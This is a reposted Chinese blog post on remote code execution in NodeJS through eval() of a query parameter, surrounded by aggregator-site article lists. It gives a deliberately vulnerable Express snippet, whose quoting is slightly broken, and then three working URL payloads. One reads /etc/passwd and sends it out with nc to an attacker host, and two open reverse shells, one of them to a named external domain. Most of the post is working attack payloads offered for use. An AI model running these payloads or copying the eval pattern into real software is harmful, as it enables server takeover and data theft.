首页
所有分类
TAGS
文字工具 EMOJI BIBLE
服务器 NodeJs

NodeJS远程代码执行

Posted in NodeJs onAugust 28, 2016

背景

@Artsploit在挖PayPal的漏洞时,发现一处NodeJS代码执行,奖励$10000美金。

测试

var express = require('express'); 
var app = express(); 
app.get('/', function (req, res) { 
  res.send('Hello eval(req.query.q));
  console.log(req.query.q);
});
app.listen(8080, function () { 
  console.log('Example listening on port 8080!');
});

任意文件读取

http://host:8080/?q=require('child_process').exec('cat+/etc/passwd+|+nc+attackerip+80')

GET SHELL

http://host:8080/?q=var+net+=+require("net"),+sh+=+require("child_process").exec("/bin/bash");var+client+=+new+net.Socket();client.connect(80,+"attackerip",+function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});

GET SHELL2

http://host:8080/?q=require("child_process").exec('bash -c "bash -i >%26 /dev/tcp/wufeifei.com/7890 0>%261"')

NodeJS远程代码执行

- Author -

hebedich

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

NodeJs 相关文章推荐
nodejs 实现模拟form表单上传文件
Jul 14 NodeJs
使用Nodejs开发微信公众号后台服务实例
Sep 03 NodeJs
轻松创建nodejs服务器(10):处理上传图片
Dec 18 NodeJs
ubuntu下安装nodejs以及升级的办法
May 08 NodeJs
Nodejs从有门道无门菜鸟起飞必看教程
Jul 20 NodeJs
nodejs入门教程五:连接数据库的方法分析
Apr 24 NodeJs
NodeJs安装npm包一直失败的解决方法
Apr 28 NodeJs
nodejs简单访问及操作mysql数据库的方法示例
Mar 15 NodeJs
nodejs(officegen)+vue(axios)在客户端导出word文档的方法
Jul 31 NodeJs
nodejs实现的http、https 请求封装操作示例
Feb 06 NodeJs
Nodejs实现微信分账的示例代码
Jan 19 NodeJs
Node.js实现爬取网站图片的示例代码
Apr 04 NodeJs
用NodeJS实现批量查询地理位置的经纬度接口
Aug 16 #NodeJs
使用nodejs中httpProxy代理时候出现404异常的解决方法
Aug 15 #NodeJs
NodeJs的优势和适合开发的程序
Aug 14 #NodeJs
在windows上用nodejs搭建静态文件服务器的简单方法
Aug 11 #NodeJs
Nodejs抓取html页面内容(推荐)
Aug 11 #NodeJs
用nodejs的实现原理和搭建服务器(动态)
Aug 10 #NodeJs
nodejs如何获取时间戳与时间差
Aug 03 #NodeJs
D1835(1) ATS-909X(1) SANGEAN(1) L4X25T(1) PHILIPS(3) 飞利浦(2) D1875(1) 山进(2) Grundig(1) S400(1)
You might like
第十四节--命名空间
2006/11/16 PHP
C/S和B/S两种架构区别与优缺点分析
2014/10/23 PHP
帝国CMS留言板回复后发送EMAIL通知客户
2015/07/06 PHP
浅谈Yii乐观锁的使用及原理
2017/07/25 PHP
Thinkphp5 自定义上传文件名的实现方法
2019/07/23 PHP
PHP设计模式(九)外观模式Facade实例详解【结构型】
2020/05/02 PHP
JavaScript事件列表解说
2006/12/22 Javascript
JavaScript高级程序设计 读书笔记之九 本地对象Array
2012/02/27 Javascript
转义字符(\)对JavaScript中JSON.parse的影响概述
2013/07/17 Javascript
用js判断输入是否为中文的函数
2014/03/10 Javascript
jQuery中hide()方法用法实例
2014/12/24 Javascript
JS实现一次性弹窗的方法【刷新后不弹出】
2016/12/26 Javascript
js实现微博发布小功能
2017/01/12 Javascript
解决nodejs中使用http请求返回值为html时乱码的问题
2017/02/18 NodeJs
详解JSONObject和JSONArray区别及基本用法
2017/10/25 Javascript
浅析Vue 生命周期
2018/06/21 Javascript
js实现京东秒杀倒计时功能
2019/01/21 Javascript
vue项目中引入Sass实例方法
2019/08/27 Javascript
微信小程序实现分页加载效果
2020/11/19 Javascript
使用Python写CUDA程序的方法
2017/03/27 Python
Python实现PS图像调整颜色梯度效果示例
2018/01/25 Python
python字符串中匹配数字的正则表达式
2019/07/03 Python
详解Python3迁移接口变化采坑记
2019/10/11 Python
Python中os模块功能与用法详解
2020/02/26 Python
PyCharm MySQL可视化Database配置过程图解
2020/06/09 Python
详解Python高阶函数
2020/08/15 Python
各大浏览器 CSS3 和 HTML5 兼容速查表 图文
2010/04/01 HTML / CSS
美体小铺法国官方网站:The Body Shop法国
2020/06/04 全球购物
日期和时间问题
2015/01/04 面试题
优秀的计算机专业求职信范文
2013/12/27 职场文书
小学生元旦感言
2014/02/26 职场文书
2015年关爱留守儿童工作总结
2015/05/22 职场文书
保险公司岗前培训工作总结
2015/10/24 职场文书
再读《皇帝的新衣》的读后感悟!
2019/08/07 职场文书
如何使用pdb进行Python调试
2021/06/30 Python
实战 快速定位MySQL的慢SQL
2022/03/22 MySQL